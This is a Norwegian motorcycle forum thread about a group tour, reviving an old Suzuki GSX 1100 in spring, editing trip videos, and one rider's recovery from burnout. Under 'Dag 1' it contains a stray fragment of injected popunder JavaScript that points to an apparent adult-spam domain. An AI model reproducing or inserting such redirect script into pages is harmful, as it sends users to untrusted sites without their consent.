xses skrev: ↑10 jul 2018, 20:13
Vi er totalt 9 i reisefølget, så dette blir morsomt!
Såpass !
Høres riktig så trivelig ut.
God tur!!
Er det lov å håpe på et aldri så lite turreferat her inne? Om ikke rett etter endt tur, men sånn litt senere... Utpå høsten en gang, kanskje?
Minner for øvrig alle som er på tur om dette underforumet, som gjerne må fylles opp med mye tekst og bilder : viewforum.php?f=59
________________________________________________________________________
De som ønsker å bidra økonomisk til driften av forumet kan benytte et av alternativene her.
MC'er:
Suzuki GSX 1100 EF, 1985 (1991), Yamaha TDM 900, 2006 (2006 - 2010), Triumph Tiger 1050 SE, 2010 (2010 - 2012), Moto Guzzi Stelvio 8V, 2012 (2012 - 2015), KTM 1290 Super Adventure, 2015 (2015 - 2018), KTM 1290 Super Adventure S, 2018 (2018 - -->), KTM 390 Duke, 2021 (2021 - 2023), Moto Guzzi V7 850 Special 100 Anniversary (2023 - -->)
KTM 1290 SA S - nok en god grunn til oppmaskinering
xses skrev: ↑10 jul 2018, 20:13
Vi er totalt 9 i reisefølget, så dette blir morsomt!
Såpass !
Høres riktig så trivelig ut.
God tur!!
Er det lov å håpe på et aldri så lite turreferat her inne? Om ikke rett etter endt tur, men sånn litt senere... Utpå høsten en gang, kanskje?
Minner for øvrig alle som er på tur om dette underforumet, som gjerne må fylles opp med mye tekst og bilder : viewforum.php?f=59
Hei. Skal så absolutt legge inn referat underveis! Bilder kommer! Og litt etterpå kommer det nok en film. Har med meg 2 actionkameraer, batterier og plass til 80timer video på minnekort.
Vinterdvale....
Etter litt batteri prat på forumet her MÅTTE jeg i dag ut å sem Sukien startet...and it did... Ikke lett med en 98modell måtte leke litt med PRI krana for å få litt bensin dit det skulle. Men den startet!
Ser jeg burde ha lagt ut en film av sommer turen... Men har ikke kommet så langt. Har redigert 4 snutter på ca 20min. Prøve å korte ned litt mer på dem så de kanskje er litt mer av allmenn interesse.
En operasjon i tryne har også vært medvirkende på at det å redigere video har vært slitsom. Kronisk bihulebetennelse unner jeg ingen.
Endelig har jeg fått redigert ferdig 5 dager med film fra vår turen 2018, den er vist for de innvolverte, og venter bare på litt svar ang å legge ut resten.
Iallefall for de som er intresserte.... Edit : Vel la ut alle 5 filmene :)
Dag 1 :
');var popunder = {expire: 6, url: "https://flirthoney-hot.life/?u=lcd8hwq&o=h6dw1n9"};}
Tja... sitter litt å ser på en plan for å kjøre meg en tur alene. Øvre Romerike (hjemme) - Vadheim (svigerfar) - Gålå/vinstra (egen hytte) og hjem igjen. Men ser at routene jeg ser for meg å kjøre kommer opp mot 7 timer. Det er kanskje litt mye, samtidig så kjørte jeg jo med 8 andre i fjor, og da satt vi på sykkelen i kanskje 10 timer om dagen. Så tenker at det går mindre "total" tid siden det bare er meg.
Nå klør det fælt i fingra. Koblet på USB uttak til under setet, så jeg kan lade 2 powerbanks mens jeg kjører.. Eller andre ting, kutter strømmen når jeg skrur av sykkelen så den ikke tapper batteri.
Etter litt kinning så kom det endelig bensin inn til motoren og "frøkna" starta. La merke til at når jeg slapp gassen så rulla ikke håndtaket kjapt tilbake, så her må jeg sjekke litt. Plan nå.. Er å få kjørt seg en liten tur og så skal plastikk av og vaskes, skal også sjekke litt rundt motoren da den svetter litt.
NÅ erre straks sesong!
FredrikE24 skrev: ↑22 mar 2019, 08:18
Er det ikke PRI på bensinkrana på disse?
Angående gass som henger, mulig litt wiresmøring hadde gjort seg.
'
Helt riktig det. :)
Lar den stå litt på PRI så kommer det seg ganske fort. Så i år med et batteri som er 100% og lærdomen av denne PRI delen på krana, så startet den MYE fortere en i fjor, og året før der.
Blir vel også innom Biltema for å få tak i en sånn wire-smører senere i dag.
Er vel bare å sette i pri og kjinne så burde den fyre enkelt?
Gamle GSX1100EFen til fattern ble forsøkt stjålet en gang. Den hadde stått en stund, og tyvene hadde tømt batteriet.. de hadde glemt å sette krana på Pri. Satt man den på pri , så fyra den tvert.
Oj.
Her har det ikke vært mye skriblerier for '19 sesongen. Det ble ikke akkurat mye kjøring da det ble en full psykisk smell og bihule operasjon nr 2 (hadde en i '17 også) i februar 2019. Høsten har gått med på å komme seg tilbake tilbake i full jobb, har avtalt med arbeidsgiver at jeg sa fra meg lederstillingen jeg hadde og jobber som vanlig ansatt. DEILIG med MYE mindre arbeid og MYE mindre ansvar.
Planer for 2020 med GSXF'n er å vedlikeholde den, prøve å få den til å se litt freshere ut, dvs freshe opp fremgafler, svingarmer, se om vi får gjort noe med litt hakk/riper etc i lakken.
Tur-messig er målet å kjøre ned til Egeskov Slott for åpningen i mars med noen med MC'ere. Samt få dratt neg op detta MC-Siden treffet i August, selv om det faller i helgen hvor minsten har bursdag. (fyller 15)
Håper også på å få kjørt meg en alenetur med 3-4 netter i telt i løpet av sesongen.
Har fått softbag til å ha inne i sideveskene så det blir lettere å få av ting av. Slipper å ta av hele plastkofferten, er spent på hvordan det blir.
Fælt når psyken svikter, både for deg og de rundt deg.
Selv har jeg aldri gått på noen direkte smell, bare nedturer som jeg skjuler etter beste evne.
Tror nok det kan være bra å " gå ned i stilling" som du gjorde, det må ikke nødvendigvis være et nederlag selv om veldig mange ser ut til å mene akkurat det.
Det å kunne gå på jobben og gå hjem uten å ta den med seg hjem er litt befriende etter en del år for meg også.
Men det tar tid før det " slipper" når det sitter litt dypt...
Men jeg jobber for å leve- ikke lever for å jobbe..